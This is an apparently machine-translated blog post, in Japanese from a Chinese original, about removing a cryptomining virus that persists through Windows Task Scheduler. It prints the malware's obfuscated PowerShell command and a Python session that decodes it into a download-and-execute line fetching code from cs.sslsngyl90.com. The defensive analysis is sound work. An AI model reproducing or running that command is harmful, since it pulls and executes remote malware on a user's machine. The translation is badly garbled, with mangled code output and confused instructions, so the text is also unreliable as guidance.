ウイルスをマイニングについて、ブート自動的に不正なソフトウェアの問題に簡単な解決策をダウンロード

少し前までは助けを私にメンター、自分のコンピュータがウイルスの採掘と述べ、自動的に電源が常にあるいくつかの悪意のあるプログラムを実行し、CPUに結果が占有されているCディスクの一部が随時表示されますが、コンピュータは、遅い実行されていますマルウェア。そしてので、システムが誤ってバックアップするためにWinRARの圧縮ソフトウェアを忘れてリセットがスパムソフトウェアをダウンロードする前に、あなたがコンピュータを起動するたびに、常にCドライブにいくつかの不正なソフトウェアをインストールし、そのシステムをリセットするために、独自の問題を抱えています。

図:

 

 

 

 これは、ウイルスが自動的にインストールされ、Cドライブのプログラムで実行されて採掘されます。

 

 

ソリューション:

このような問題を解決するために一般的な方法は、検索バーにあなたのタスクスケジューラ、非常に単純な、直接検索を開くことですがあります。図:

 

 見に開きます。

 

 あなたはシステムをプログラム定期的にここで実行されています。悪意のあるソフトウェアは、自分の「悪」を埋め込むシステムが自動的に一部の悪意あるプログラムを実行させる、または自動的にソフトウェアをダウンロードするためにここにあります。このようスケジューラをマイニングなど悪質なウイルス:

 

 また、自動的にダウンロードするために同様の360のセキュリティブラウザに依存する一方で、マルウェアタスクスケジューラは、自分のコンピュータにインストールされています。

直接無効にし、上記の問題を解決するために削除します!しかし、また、自動的に悪意のあるプログラム、ソフトウェアや不正なソフトウェアの削除のこれらの一緒にアンロード結果をもたらすがダウンロードされます!

 

だから、どのようにこれらの悪質なプログラムが動作していますか?

私はそれが自動的に次のように自動的に実行マイニングウイルスプログラムで実行されるコードを参照してください。

たpowershell.exe -epバイパス-e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAY
wBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQA
cAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA

それは、次のコードのpythonを復号化され、Iは、復号化BASE64に用い、自動的にPowerShellのコード・セグメント・バックを実行して、です。

C:\ Users \ユーザーPC>のpython
のPython 3.6.4(v3.6.4:d48eceb、2017年12月19日、午前6時54分40秒)[MSC v.1900 64ビット(AMD64)] Win32で
タイプ"ヘルプ"、 "著作権"詳細については、「クレジット」または「ライセンス」。
>>>インポートbase64で
>>> URL = "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA"
>>> str_url = base64.b64decode(URL)
>>>印刷(str_url)
B「I \ x00E \ x00X \ X00 \ X00(\ X00(\ x00n \ x00e \ x00w \ x00- \ x00o \ x00b \ x00j \ x00e \ x00c \ x00t \ X00 \ x00n \ x00e \ x00t \ X00 \ x00w \ x00e \ x00b \ x00c \ x00l \ x00i \ x00e \ x00n \ x00t \ X00)\ X00 \ x00d \ x00o \ x00w \ x00n \ x00l \ x00o \ x00a \ x00d \ x00s \ x00t \ x00r \ x00i \ x00n \ x00g \ X00(\ X00' \ x00h \ x00t \ x00t \ x00p \ X00:\ X00 / \ X00 / \ x00c \ x00s \ X00 \ x00s \ x00s \ x00l \ x00s \ x00n \ x00g \ x00y \ x00l \ x009 \ X000 \ X00。\ x00c \ x00o \ x00m \ X00' \ x00から)\ X00)\ X00"
>>> str_url = base64.b64decode(URL).decode( "UTF-8")
>>> STR(str_url)
「I \ x00E \ x00X \ X00 \ X00(\ X00(\ x00n \ x00e \ x00w \ x00- \ x00o \ x00b \ x00j \ x00e \ x00c \ x00t \ X00 \ x00n \ x00e \ x00t \ X00 \ x00w \ x00e \ x00b \ x00c \ x00l \ x00i \ x00e \ x00n \ x00t \ X00)\ X00 \ x00d \ x00o \ x00w \ x00n \ x00l \ x00o \ x00a \ x00d \ x00s \ x00t \ x00r \ x00i \ x00n \ x00g \ X00 (\ X00' \ x00h \ x00t \ x00t \ x00p \ X00:\ X00 / \ X00 / \ x00c \ x00s \ X00 \ x00s \ x00s \ x00l \ x00s \ x00n \ x00g \ x00y \ x00l \ x009 \ X000 \ X00 。\ x00c \ x00o \ x00m \ X00' \ x00から)\ X00)\ X00"
>>> str_url.replace( '\ X00'、 '')
「IEX((新しいオブジェクトnet.webclient).downloadstring( 'HTTP ://cs.sslsngyl90.com '))」

どの置き換える文字化け、あなたがURLを取得することができます:http://cs.sslsngyl90.comを

オープンの「謎」を発見しました

 

 これらは、単純な解決策なマルウェアです。

 

おすすめ

転載: www.cnblogs.com/ZominCeleste/p/12624168.html